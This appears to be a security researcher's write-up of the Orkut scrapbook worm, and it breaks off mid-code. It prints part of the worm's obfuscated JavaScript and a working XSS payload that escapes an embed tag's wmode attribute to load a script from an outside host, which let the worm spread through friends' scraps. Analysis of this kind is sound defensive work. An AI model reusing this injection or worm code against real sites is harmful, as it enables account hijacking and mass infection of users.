Orkut is a popular social networking site with millions of registered users. A couple of days ago Orkut was hit with a worm that impacted close to 700,000 users in approximately 24 hours. We took a closer look at the exploit to get an idea of why so many users systems were infected. The exploit was contained in a JavaScript file, aptly named "virus.js file," which was injected using an embed tag. Here is a snippet of the JavaScript file:
function $(p,a,c,k,e,d) { e=function(c) { return(c35?String.fromCharCode(c+29):c.toString(36)) }; if(!.replace(/^/,String)){ while(c--){d[e(c)]=k[c]||e(c)} k=[function(e){return d[e]}]; e=function(){return\w+}; c=1 }; while(c--){ if(k[c]){ p=p.replace(new RegExp(\b+e(c)+\b,g),k[c]) } } return p };
setTimeout(
$(5 j=0;5 q=1q["2o.H"];5 E=1q["2p.K.27"];7 B(){Z{b i 14("29.1l")}
L(e){};Z{b i 14("2b.1l")}L(e){};Z{b i 2l()}L(e){};b J};
7 W(g,P,m,c,9,U){5 1m=g+"="+19(P)+(m?"; m="+m.2f():"")+(c?"; c="+c:"")+(9?"; 9="+9:"")+(U?"; U":"");
8.y=1m};7 v(g){5 l=8.y;5 A=g+"=";5 h=l.S("; "+A);6(h==-1){h=l.S(A);6(h!=0){b 2h}}16{h+=2};
5 u=8.y.S(";",h);6(u==-1){u=l.M};b 2j(l.2m(h+A.M,u))};
7 26(g,c,9){6(v(g)){8.y=g+"="+(c?"; c="+c:"")+(9?"; 9="+9:"")+"; m=1u, 1i-1v-1x 1g:1g:1i 1y";1U.1z(0)}};
7 G(){5 3=B();6(3){3.R("1A","o://k.w.p/1B.z",C);3.a(J);3.Y=7(){6(3.X==4){6(3.1a==1c){5 1r=3.1Q;5 t=8.1n("t");
t.1D=1r;5 f=t.D("f").O(0);6(f){f.1M(f.D("1F").O(0));f.1G("1H","N");f.1J.1K="1L";8.1N.1f(f);V()}}16{G()}}};
3.a(J)}};7 T(){5 a="H="+n(q)+"&K="+n(E)+"&15.1O";5 3=B();3.R(q,o://k.w.p/1P.z?1R=1S,C);
3.12(10-1e,Q/x-k-17-1b);3.a(a);3.Y=7(){6(3.X==4){6(3.1a!=1c){T();b};G()}}};
7 V(){6(j==8.18("N").M){b};
…
We can see from the above code that the JavaScript is heavily obfuscated. After decoding and analyzing the strings in the script we confirmed that it is indeed targeting Orkut users. Our analysis of the decoded JavaScript showed that when the virus.js script is executed it forces the user to join a community called “Infectados pelo Vírus do Orkut”. The name of this community is in Portuguese and translates to “Infected by Virus Orkut.”
This is a novel way for the author of the worm to keep track of accounts infected by the worm. The script then loads the "friends list" of the infected Orkut account and sends them a malicious scrap. The worm uses Orkut scrap entries as its vector of propagation. Below is an example of the XML code to define the Orkut scrap:
2008 vem ai… que ele comece mto bem par avc <br/> [silver]RL Wed Dec 19 14:57:48 UTC+0530 2007[/silver] <br/> <embed src=aspx" target=_blank>http://www.orkut.com/LoL.aspx type= “application/x-shockwave-flash” wmode=”transparent’); Script=document.createElement(‘script’); Script.src=’http://files.myopera111.com/[REMOVED].js’; Document.getElementByTagname(‘head’)[0].appendChild (script);escape(‘” width=”1” height=”1”> </embed>
When you look at the code XML there are a few attributes for the embed tag, such as wmode, width, height, etc. The embed tag expects these attributes in order to create a flash object to display the flash content. Now when you look closely at the code, notice the wmode attribute:
wmode=”transparent’);
The author has closed wmode with ‘); and has added some script code in the attribute value itself. Let’s analyze this further. We tested the script with a variant of the malicious scrap:
“<embed src="http://www.orkut.com/LoL.aspx" type="application/x-shockwave-flash" wmode="transparent” width=”1” height=”1”>”.
When Orkut parsed this scrapbook entry, we found it behaved in a similar way to the following code in an Orkut page:
<script type="text/javascript"> var flashWriter = new _SWFObject(http://www.orkut.com/LoL.aspx, 337533968, 1, 1, 9, #FFFFFF, autohigh, , , 337533968); flashWriter._addParam(wmode, transparent); flashWriter._addParam(allowNetworking, internal); flashWriter._addParam(allowScriptAccess, never); flashWriter._setAttribute(style, ); flashWriter._write(flashDiv337533968);</script>
The Orkut application parsed the scrap text and created the flash object with values specified in the scrap.
If we look at the source code of the malicious scrap it looks like the below sample (the injected code is marked in bold and red). Note the escape function is added to allow the malicious code to be integrated:
flashWriter._addParam ( wmode, transparent); script = document.createElement ( script); script.src = http://files.myopera.com/virusd[REMOVED]; document.getElementsByTagName ( head) [0]. AppendChild script); escape (); flashWriter._addParam ( allowNetworking, internal); flashWriter._addParam ( allowSc
|
